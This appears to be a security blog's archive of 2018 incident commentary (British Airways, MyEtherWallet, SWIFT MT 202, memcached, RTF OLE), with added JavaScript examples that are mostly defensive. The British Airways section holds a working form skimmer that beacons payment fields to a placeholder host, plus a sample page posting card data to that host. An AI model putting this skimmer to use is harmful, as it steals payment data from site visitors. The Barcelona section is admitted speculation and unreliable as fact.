Category Archives: cyber security incident news highlight

An attack on a social media platform exposes nearly 50 million users' information – Sep 2018

In the 1980s our daily lives did not involve any electronic social media, and we understood that we should avoid talking to strangers. As time went by, internet social media fine-tuned our minds; as a result we now make friends on, and rely on, these communication platforms.

Because these are popular, open platforms, it is hard to avoid scam activity, and the risk grows in such circumstances. Even if you have good security awareness, who can guarantee that the threat actor will target only the individual rather than the social media vendor itself?

Back in October 2016, the memcached developers fixed three remote code execution vulnerabilities (CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706). The flaws affected memcached’s binary protocol for storing and retrieving data and one of them was in the Simple Authentication and Security Layer (SASL) implementation.

Remark: CVE-2016-8704 – An integer overflow in the process_bin_append_prepend function in memcached, which is responsible for processing several commands of the memcached binary protocol, can be abused to cause a heap overflow and lead to remote code execution.
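To make the bug class in the remark concrete, here is an added example (written for this page, not memcached's own code). It parses the 24-byte memcached binary-protocol request header, whose layout is the documented one, and then derives the value length two ways: the unchecked way, where a key length larger than the client-supplied body length wraps in 32-bit arithmetic to a huge number, and the checked way, which rejects the request first. The checked/unchecked functions are a simplified model of the bug class and are not the actual process_bin_append_prepend code; the two request headers are constructed.

```javascript
// Added example (not memcached's own code): parse a memcached binary-protocol
// request header and show how an unchecked length subtraction wraps in 32-bit
// arithmetic. The 24-byte header layout is the one documented for the binary
// protocol; the unchecked/checked value-length derivations are a simplified
// model of the bug class, not the actual process_bin_append_prepend code.
const HEADER_LEN = 24;

function parseHeader(buf) {
  if (buf.length < HEADER_LEN) throw new Error('short header');
  return {
    magic: buf.readUInt8(0),          // 0x80 = request
    opcode: buf.readUInt8(1),         // 0x0e = Append, 0x0f = Prepend
    keylen: buf.readUInt16BE(2),
    extlen: buf.readUInt8(4),
    datatype: buf.readUInt8(5),
    vbucket: buf.readUInt16BE(6),
    bodylen: buf.readUInt32BE(8),     // extras + key + value, as claimed by the client
    opaque: buf.readUInt32BE(12),
    cas: buf.readBigUInt64BE(16),
  };
}

// Unchecked derivation, as C does it on uint32 operands: if keylen + extlen
// exceeds the client-supplied bodylen, the subtraction wraps to a huge value,
// and an allocation or copy sized from it is where memory corruption begins.
function valueLengthUnchecked(h) {
  return (h.bodylen - h.keylen - h.extlen) >>> 0;
}

// Hardened derivation: validate that the declared parts fit inside bodylen
// before any arithmetic, and reject the request otherwise.
function valueLengthChecked(h) {
  if (h.keylen + h.extlen > h.bodylen) {
    throw new RangeError(`keylen ${h.keylen} + extlen ${h.extlen} exceeds bodylen ${h.bodylen}`);
  }
  return h.bodylen - h.keylen - h.extlen;
}

// Constructed request headers (sample input, not captured traffic).
function buildHeader({ opcode, keylen, extlen, bodylen }) {
  const buf = Buffer.alloc(HEADER_LEN);
  buf.writeUInt8(0x80, 0);
  buf.writeUInt8(opcode, 1);
  buf.writeUInt16BE(keylen, 2);
  buf.writeUInt8(extlen, 4);
  buf.writeUInt32BE(bodylen, 8);
  return buf;
}

const BENIGN_APPEND = buildHeader({ opcode: 0x0e, keylen: 3, extlen: 0, bodylen: 8 });
// Key length larger than the whole body: impossible for a well-formed request.
const CRAFTED_APPEND = buildHeader({ opcode: 0x0e, keylen: 0x20, extlen: 0, bodylen: 0x10 });

function demo() {
  const out = {};
  for (const [name, raw] of [['benign', BENIGN_APPEND], ['crafted', CRAFTED_APPEND]]) {
    const h = parseHeader(raw);
    let checked;
    try { checked = valueLengthChecked(h); } catch (e) { checked = `rejected: ${e.message}`; }
    out[name] = { unchecked: valueLengthUnchecked(h), checked };
  }
  return out;
}

console.log(demo());
```

The crafted header is accepted by the unchecked path with a value length of about 4 GB, which is the kind of number that ends up in an allocation or a copy; the checked path refuses it before any arithmetic happens.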

Do you think the data breach Facebook announced yesterday might actually have happened earlier last year, without anybody knowing?

Related news – https://www.forbes.com/sites/thomasbrewster/2018/09/29/how-facebook-was-hacked-and-why-its-a-disaster-for-internet-security/#74855f792033

Hypothesis – About the cyber attack on the Port of Barcelona (Sep 2018)

We heard that the Port of Barcelona suffered a hacker attack last week (20th Sep 2018). The logistics and transportation industry attracts hackers' interest because they can extort a ransom.

There has been no official announcement or incident details to date. The following is merely my personal imagination of this incident; any resemblance to actual events or persons is entirely coincidental.

We noticed that Portic Barcelona adopted WebLogic for a private PaaS in 2014. The solution aimed to improve performance and to facilitate interaction between its members through its information services for logistics agents and other customers.

What if the vulnerability below were present? Do you think that scenario would resemble this incident?

ORACLE WEBLOGIC SERVER JAVA DESERIALIZATION REMOTE CODE EXECUTION VULNERABILITY (CVE-2018-2628) BYPASS

Headline news article for reference:

https://www.portseurope.com/barcelona-port-suffers-a-cyber-attack/

Consider how jQuery can affect millions of people's confidential data – Sep 2018

RiskIQ has exposed one possible way the hackers stole British Airways customers' credit card data. The researchers speculate that the suspects used the "inject jQuery into a page" technique to collect the confidential data; BA claims that the breach affected only payment card data.
RiskIQ's proof of concept shows that the technique is equivalent to an ATM skimmer, except that this time the skimmer is installed on the web page: when the victim clicks the specific button on the compromised page, a copy of the victim's personal data is sent to the hacker's server.
Injecting jQuery into a page is not news, but combining it with the ATM skimmer concept may be.
I am not going to copy RiskIQ's proof-of-concept code this time; instead I will show sample inject-jQuery code for your reference, to refresh your memory.

BeEF, the Browser Exploitation Framework, is a testing tool designed to enable penetration testers to launch client-side attacks against target browsers.
The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run in the client's browser. When it does, it calls back to the BeEF server and reports a great deal of information about the target. So this is another possible way British Airways could have lost the customer data.
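Both the skimmer RiskIQ describes and the BeEF hook share one shape: a script served from a host the site owner does not control runs in the victim's browser and sends data back out. The added example below (written for this page; it is neither RiskIQ's proof of concept nor BeEF's hook.js) models that shape in Part 1 and, in Part 2, gives the check a defender can run over a page: list every script whose src, or whose inline body, references a host outside an allowlist. The form selector, the gate.php path, the hostnames (all under the reserved .test TLD) and the sample checkout page are constructed.

```javascript
// Added example; this is neither RiskIQ's proof of concept nor BeEF's hook.js.
// Part 1 models the shape of the hook: a script from a host the site owner does
// not control which, when the payment form is submitted, serialises the fields
// and beacons them elsewhere. Part 2 is the defender's check: every script whose
// src or inline body references a host outside an allowlist. Hostnames are
// constructed placeholders under the reserved .test TLD.

// ---- Part 1: the hook. Pure helpers run under Node; attachHook() needs a browser DOM.
function serializeForm(fields) {
  return Object.entries(fields)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join('&');
}

function buildBeaconUrl(exfilHost, fields) {
  // A GET to an innocuous-looking path so the request blends into proxy logs.
  return `https://${exfilHost}/gate.php?${serializeForm(fields)}`;
}

function attachHook(doc, exfilHost) {
  const form = doc.querySelector('form#payment'); // assumed form id
  if (!form) return false;
  form.addEventListener('submit', () => {
    const fields = {};
    for (const el of form.querySelectorAll('input')) fields[el.name] = el.value;
    new doc.defaultView.Image().src = buildBeaconUrl(exfilHost, fields); // fire-and-forget
  });
  return true;
}

// ---- Part 2: audit an HTML document for scripts and URLs that leave the allowlist.
const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_RE = /\bsrc\s*=\s*["']([^"']+)["']/i;
const URL_RE = /https?:\/\/[A-Za-z0-9.-]+/g;

function hostOf(ref) {
  const abs = ref.startsWith('//') ? `https:${ref}` : ref;       // protocol-relative src
  try { return new URL(abs).hostname.toLowerCase(); } catch (e) { return null; } // relative = same origin
}

function auditHtml(html, allowedHosts) {
  const allowed = new Set(allowedHosts.map(h => h.toLowerCase()));
  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const [, attrs, body] = m;
    const src = (attrs.match(SRC_RE) || [])[1];
    const host = src ? hostOf(src) : null;
    if (host && !allowed.has(host)) findings.push({ kind: 'foreign-script', host, ref: src });
    for (const u of body.match(URL_RE) || []) {
      const h = hostOf(u);
      if (h && !allowed.has(h)) findings.push({ kind: 'foreign-url-in-inline-script', host: h, ref: u });
    }
  }
  return findings;
}

// Constructed checkout page: one legitimate CDN, one injected library copy and
// one inline handler that posts the serialised form to the same foreign host.
const ALLOWED_HOSTS = ['cdn.example-airline.test'];
const SAMPLE_PAGE = `<html><head>
<script src="/static/modernizr.js"></script>
<script src="https://cdn.example-airline.test/checkout.js"></script>
<script src="//assets.example-skimmer.test/js/jquery-3.1.1.min.js"></script>
<script>
  $(document).ready(function () {
    $('#submitButton').on('click', function () {
      var d = $('#payment').serialize();
      $.ajax({ type: 'POST', url: 'https://assets.example-skimmer.test/gateway/app', data: d });
    });
  });
</script>
</head></html>`;

console.log(auditHtml(SAMPLE_PAGE, ALLOWED_HOSTS));
```

The audit is deliberately crude (regex over the served HTML) but it catches the two things both the skimmer and a BeEF hook need: a foreign script source and a foreign callback destination. The same allowlist is what a Content-Security-Policy script-src / connect-src directive would enforce in the browser itself.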

British Airways announcement – 7th Sep 2018 (380,000 customers' bank details stolen from website)

A spokesman for British Airways said that around 380,000 payment cards had been compromised and that the airline had notified the police. He stated that they suspected the hackers stole customers' bank details through the official website and/or the mobile app; however, the stolen data did not include travel or passport details.

If European citizens are among the victims of this incident, the GDPR penalty can be a fine of up to 20 million euros or 4% of total worldwide annual turnover for the preceding financial year, whichever is higher. The official announcement is linked below:

https://www.britishairways.com/en-hk/information/incident/data-theft/latest-information?dr=&dt=British%20Airways&tier=&scheme=&logintype=public&audience=travel&CUSTSEG=&GGLMember=&ban=%7C%7CP1M%7C%7C%7C%7C%7C%7C%7CHOME%7C%7C%7C%7CL4%7C%7C%7C%7Canonymous-inspiration%7C%7C%7C&KMtag=c&KMver=1.0&clickpage=HOME

Aug 2018 – Malware (KEYMARBLE)

My friend informed me that a new piece of malware was wreaking havoc. Meanwhile US-CERT issued a technical article describing the details to keep the world alert, and also provided an indicator of compromise (IOC) file for reference. I was interested, so I put the file into a sandbox to see exactly what would happen. The fact is that the threat actor embedded malicious code and lures the victim into opening the document. The overall procedure resembles a Word document asking you to execute XML content. The whole procedure may not trigger an antivirus alert (antivirus may detect this now, but I am not absolutely sure) until the infection reaches phase two: yes, downloading a malicious executable file. If a similar scenario happens in your company, it sounds like your IT campus has a cat doing the monitoring, and the cat will catch the mouse once it appears. How does your cat know this RAT has appeared? It all relies on YARA rules (see the attached diagram for reference). People may be scared of a web page with a hyperlink at the top, and therefore none is provided this time.

–End–

New version of BlackEnergy cyber attack targets Microsoft OLE product design weakness

The Ukrainian intelligence agency has claimed it stopped a cyber attack against a chlorine plant that was launched using the notorious VPNFilter malware. Perhaps the world is focusing on the spread and infections of VPNFilter; we learned earlier last month that the targets of that attack are low-end wireless routers and network-attached storage (NAS) devices.

However, from my point of view the main stream of cyber attacks so far is not limited to this incident. The fact is that what lures attackers into re-engineering their attacks seems to remain Microsoft Office. What is the key component? Yes, it is OLE, Object Linking and Embedding. Or you may say that if you follow Microsoft's Patch Tuesday remediation schedule you will be safe. That looks correct, but a plain RTF file has been able to evade detection by many security products, and therefore attackers used similar techniques to carry out cyber attacks in Ukraine. The political situation in Ukraine is a never-ending story, and meanwhile the world never stops using MS Office documents!
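Since the point above is that an RTF carrying an OLE object can slip past products that only look at the outer file, here is an added triage check (written for this page, not taken from any product or from the post): it pulls every \object group out of an RTF, reports the declared \objclass, whether \objupdate is set (which asks the host application to refresh the object when the document opens) and whether the hex-encoded \objdata contains the OLE compound-file signature D0 CF 11 E0 A1 B1 1A E1. The sample RTF is constructed, and the OLE1 framing inside \objdata is not parsed here.

```javascript
// Added example, not from the post or from any product: quick triage of an RTF
// for embedded OLE objects. Reports each \object group's \objclass, whether
// \objupdate is present and whether the decoded \objdata carries the OLE
// compound-file signature. The sample RTF is constructed; the OLE1 framing
// that precedes the native data inside \objdata is not parsed here.
const CFB_MAGIC = Buffer.from('d0cf11e0a1b11ae1', 'hex');

function decodeHex(text) {
  const clean = text.replace(/[^0-9a-fA-F]/g, '');
  return Buffer.from(clean.length % 2 ? clean.slice(0, -1) : clean, 'hex');
}

// Extract balanced groups that start with "{\object". Brace matching is needed
// because the \objclass and \objdata groups nest inside the \object group.
function findObjectGroups(rtf) {
  const groups = [];
  let i = rtf.indexOf('{\\object');
  while (i !== -1) {
    let depth = 0, j = i;
    for (; j < rtf.length; j++) {
      if (rtf[j] === '\\') { j++; continue; }          // skip the escaped char (\{ \} \\)
      if (rtf[j] === '{') depth++;
      else if (rtf[j] === '}' && --depth === 0) break;
    }
    groups.push(rtf.slice(i, j + 1));
    i = rtf.indexOf('{\\object', j + 1);
  }
  return groups;
}

function triageRtf(rtf) {
  return findObjectGroups(rtf).map(g => {
    const cls = g.match(/\\objclass\s+([^\\{}]+)/);
    const data = g.match(/\\objdata\s+([0-9a-fA-F\s]+)/);
    const bytes = data ? decodeHex(data[1]) : Buffer.alloc(0);
    return {
      objclass: cls ? cls[1].trim() : null,
      objupdate: /\\objupdate\b/.test(g),
      objdataBytes: bytes.length,
      hasCompoundFile: bytes.indexOf(CFB_MAGIC) !== -1,
    };
  });
}

// Constructed sample: one embedded "Package" object with auto-update set and a
// compound-file header inside its data. The leading words stand in for the
// OLE1 object header and carry no meaning for this check.
const SAMPLE_RTF = String.raw`{\rtf1\ansi
{\object\objemb\objupdate{\*\objclass Package}{\*\objdata
01050000 02000000 08000000 5061636b 61676500 00000000 00000000 10000000
d0cf11e0 a1b11ae1 00000000 00000000 00000000 00000000 3e000300 feff0900
}}
\par Plain text paragraph.}`;

console.log(triageRtf(SAMPLE_RTF));
```

A result with objupdate set and a compound file inside the object is the combination worth pulling aside for deeper analysis, regardless of what the file extension says.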

Reference:

Headlines news – Ukraine claims it blocked VPNFilter attack at chemical plant : https://www.theregister.co.uk/2018/07/13/ukraine_vpnfilter_attack/

My speculation on how Cisco (Talos) found the malware (VPNFilter malware)


Hackers hijack MyEtherWallet's infrastructure (Apr 2018)

ISPs tend to restrict what an end customer can advertise; however, not every ISP filters customer advertisements.
That is one possible factor that lets a hacker who has compromised a customer's router advertise errant information into the global routing table.

The attackers stole at least $13,000 in Ethereum within two hours.

Security experts speculate that it was a DNS attack, but many attack methods could have been used, for example BGP hijacking. The scenario is shown in the diagram above.
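The filtering the paragraphs above say an ISP should do has a concrete form: route-origin validation. The added example below (written for this page; it is not the post's diagram and not any vendor's router code) implements the check an upstream can apply to a customer's BGP announcement, with the RFC 6811 outcomes valid / invalid / not-found, and shows why a more-specific prefix announced from the wrong AS is rejected when a ROA exists but sails through when none does. The ROA set, prefixes and AS numbers are constructed; it is IPv4 only to keep the bit arithmetic short.

```javascript
// Added example, not from the post or from any vendor's router code: the
// route-origin check an upstream ISP (or an RPKI-aware router) can apply to a
// customer's BGP announcement before accepting it. Validation states follow
// RFC 6811 (valid / invalid / not-found). ROAs, prefixes and AS numbers are
// constructed; IPv4 only.
function ipv4ToInt(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some(p => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error(`bad IPv4 address ${ip}`);
  }
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

function maskFor(len) {
  return len === 0 ? 0 : (0xFFFFFFFF << (32 - len)) >>> 0; // JS shifts are mod 32, so guard len 0
}

function parsePrefix(cidr) {
  const [ip, lenStr] = cidr.split('/');
  const len = Number(lenStr);
  if (!Number.isInteger(len) || len < 0 || len > 32) throw new Error(`bad prefix length in ${cidr}`);
  return { net: (ipv4ToInt(ip) & maskFor(len)) >>> 0, len };
}

// True when `announced` lies inside `covering` (equal or more specific).
function covers(covering, announced) {
  return announced.len >= covering.len &&
    ((announced.net & maskFor(covering.len)) >>> 0) === covering.net;
}

// RFC 6811: 'not-found' if no ROA covers the prefix; 'valid' if some covering
// ROA has a matching origin AS and the announced length is within its maxLength;
// otherwise 'invalid' (a more-specific hijack lands here even from the right AS).
function validateOrigin(announcedCidr, originAs, roas) {
  const ann = parsePrefix(announcedCidr);
  let covered = false;
  for (const roa of roas) {
    const pfx = parsePrefix(roa.prefix);
    if (!covers(pfx, ann)) continue;
    covered = true;
    const maxLen = roa.maxLength === undefined ? pfx.len : roa.maxLength;
    if (ann.len <= maxLen && roa.asn === originAs) return 'valid';
  }
  return covered ? 'invalid' : 'not-found';
}

// A customer-facing ingress policy: the origin must be the customer's own AS,
// and an announcement contradicted by a ROA is dropped. 'not-found' is still
// accepted, which is why unregistered address space remains hijackable.
function acceptFromCustomer(announcedCidr, originAs, customerAs, roas) {
  if (originAs !== customerAs) return false;
  return validateOrigin(announcedCidr, originAs, roas) !== 'invalid';
}

// Constructed ROA set: the first /24 may only be originated by AS64500 and may
// not be split into more specifics; the second has no maxLength (defaults to /24).
const ROAS = [
  { prefix: '203.0.113.0/24', maxLength: 24, asn: 64500 },
  { prefix: '198.51.100.0/24', asn: 64501 },
];

console.log(validateOrigin('203.0.113.0/24', 64500, ROAS)); // legitimate origin
console.log(validateOrigin('203.0.113.0/25', 64666, ROAS)); // more-specific from another AS
console.log(validateOrigin('192.0.2.0/24', 64502, ROAS));   // no ROA at all
```

The second call is the MyEtherWallet-style case: a more-specific prefix for someone else's space, which wins in the global table because longest match beats everything, unless an upstream runs this check and drops it.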

Headline news shown below:

https://www.theverge.com/2018/4/24/17275982/myetherwallet-hack-bgp-dns-hijacking-stolen-ethereum


Verge Is Forced to Fork After Suffering a 51% Attack

Blockchain technology fundamentally contains advanced security features, yet heists on such a secure platform are frequent. Looking back, why was it hacked? It proves that the problem is not a design flaw in blockchain technology; most likely the root causes lie at the endpoint (client side) or in operations management (for example showing privileged credentials in the system event log). Rumours spread yesterday that Verge users feared the attacker might use his dominant network position to siphon funds from their accounts. The Verge technical team announced that it was a hash attack and that only some blocks were affected during a 3-hour period, not 13 hours. But what do you think? Is there a zero-day in the e-wallet? The headline news can be found at the following URL.

https://news.bitcoin.com/verge-is-forced-to-fork-after-suffering-a-51-attack/

Bank Negara Malaysia (Bank) detected and foiled a cybersecurity incident involving attempted unauthorized fund transfers using falsified SWIFT messages.

The Easter holiday makes me lazy. I saw a cyber incident alert posted by my friend Enoch yesterday, but I ignored it until this evening. The details of this incident are that the crooks used falsified SWIFT messages to try to achieve their goal; the news says they were not successful. As far as I remember, in February this year City Union Bank in India was the victim of a cyber hack through the SWIFT system. My speculation is that it is the flaw of MT 202, a fundamental design limitation of the original MT 202 message. Perhaps MT 202 COV provides the compensating control, but MT 202 COV must not be used for any other interbank transfer, and MT 202 itself is still valid and not end-of-life yet. A hint of the technical concerns is shown in the attached picture; see whether this is the root cause of this incident.

MT 202 design weakness lures financial crime

i. Suspicious activity monitoring on the underlying originator and beneficiary in the message would not be performed.

ii. The originating bank could be in a jurisdiction with different sanction watch lists and the technical capabilities of each bank’s sanction screening program could vary.
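Point (i) is easier to see with the two message types side by side. The added example below (written for this page; it is not the post's attached picture and not any bank's screening code) parses the text block (block 4) of a SWIFT MT message, splits an MT 202 COV into its Sequence A (bank-to-bank leg) and Sequence B (underlying customer details, starting at the first field 50a), and runs a naive watchlist screen. On the plain MT 202 the ordering and beneficiary customer fields simply do not exist, so a listed party never produces a hit. Tag names and the sequence split follow the MT 202 / MT 202 COV layout; the messages, BICs, names and watchlist are constructed.

```javascript
// Added example, not the post's attached picture and not any bank's screening
// code: a minimal parser for block 4 of an MT 202 / MT 202 COV and a screening
// step that makes point (i) concrete. Tag names and the Sequence A / Sequence B
// split follow the SWIFT MT 202 COV layout; messages, BICs, names and the
// watchlist are constructed.
function parseBlock4(msg) {
  const m = msg.match(/\{4:\s*([\s\S]*?)\s*-\}/);
  if (!m) throw new Error('no block 4 in message');
  const fields = [];
  for (const line of m[1].split(/\r?\n/)) {
    const t = line.match(/^:(\d{2}[A-Z]?):(.*)$/);
    if (t) fields.push({ tag: t[1], value: t[2] });
    else if (fields.length) fields[fields.length - 1].value += '\n' + line; // continuation line
  }
  return fields;
}

// In an MT 202 COV, Sequence B (underlying customer credit transfer details)
// starts at the first field 50a. Everything before it is Sequence A, the
// bank-to-bank leg, which is all a plain MT 202 ever carries.
function splitSequences(fields) {
  const i = fields.findIndex(f => /^50[AFK]$/.test(f.tag));
  return i < 0 ? { seqA: fields, seqB: [] } : { seqA: fields.slice(0, i), seqB: fields.slice(i) };
}

function parties(msg) {
  const { seqA, seqB } = splitSequences(parseBlock4(msg));
  const pick = (seq, re) => seq.filter(f => re.test(f.tag)).map(f => f.value);
  return {
    cov: /\{119:COV\}/.test(msg),                      // block 3 validation flag
    orderingInstitution: pick(seqA, /^52[AD]$/),
    beneficiaryInstitution: pick(seqA, /^58[AD]$/),
    orderingCustomer: pick(seqB, /^50[AFK]$/),
    beneficiaryCustomer: pick(seqB, /^59[AF]?$/),
  };
}

// Screening can only look at what the message carries. On a plain MT 202 the
// customer fields do not exist, so a listed payer or payee never produces a hit.
function screen(msg, watchlist) {
  const p = parties(msg);
  const hits = names => names.filter(n => watchlist.some(w => n.toUpperCase().includes(w.toUpperCase())));
  return {
    cov: p.cov,
    underlyingPartiesVisible: p.orderingCustomer.length > 0 || p.beneficiaryCustomer.length > 0,
    institutionHits: hits([...p.orderingInstitution, ...p.beneficiaryInstitution]),
    customerHits: hits([...p.orderingCustomer, ...p.beneficiaryCustomer]),
  };
}

// Constructed messages: the same bank-to-bank leg, once as a plain MT 202 and
// once as an MT 202 COV that also discloses the underlying customers.
const MT202_PLAIN = `{1:F01AAAABB2AXXXX0000000000}{2:I202CCCCDD2AXXXXN}{4:
:20:TRN20180329001
:21:REL20180329001
:32A:180329USD1000000,00
:52A:AAAABB2AXXX
:58A:CCCCDD2AXXX
-}`;

const MT202_COV = `{1:F01AAAABB2AXXXX0000000000}{2:I202CCCCDD2AXXXXN}{3:{119:COV}}{4:
:20:TRN20180329002
:21:REL20180329002
:32A:180329USD1000000,00
:52A:AAAABB2AXXX
:58A:CCCCDD2AXXX
:50K:/12345678
SAMPLE LISTED ENTITY LTD
1 CONSTRUCTED STREET
:59:/87654321
BENEFICIARY CORP
-}`;

const WATCHLIST = ['SAMPLE LISTED ENTITY']; // constructed

console.log(screen(MT202_PLAIN, WATCHLIST));
console.log(screen(MT202_COV, WATCHLIST));
```

Both messages move the same amount between the same two banks; only the COV variant lets an intermediary see that the underlying ordering customer is on the list. That is the gap described in (i), and point (ii) follows from it: even when the COV fields are present, each bank along the chain screens them against its own lists with its own tooling.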

The URL below is the press release (Cybersecurity Incident Involving the Use of Falsified SWIFT Messages):

http://www.bnm.gov.my/index.php?ch=en_press&pg=en_press&ac=4651

Reference:

City Union Bank in India victim of cyber hack through SWIFT system – Reuters Headline News (19th Feb 2018)


How much is your personal data worth?

Microsoft Windows Defender makes the world safer. A threat actor masqueraded as a legitimate file with the goal of cryptocoin mining, and Windows Defender killed it within seconds; it is very powerful. It also hints to the world that different countries will end up with their own operating systems. Why? Nobody wants to be under monitoring all the time.

For more details about this news, please refer to the URL below.

https://www.forbes.com/sites/leemathews/2018/03/08/microsoft-saves-400000-windows-users-from-a-malicious-cryptocoin-miner/#5cc0f2b046a6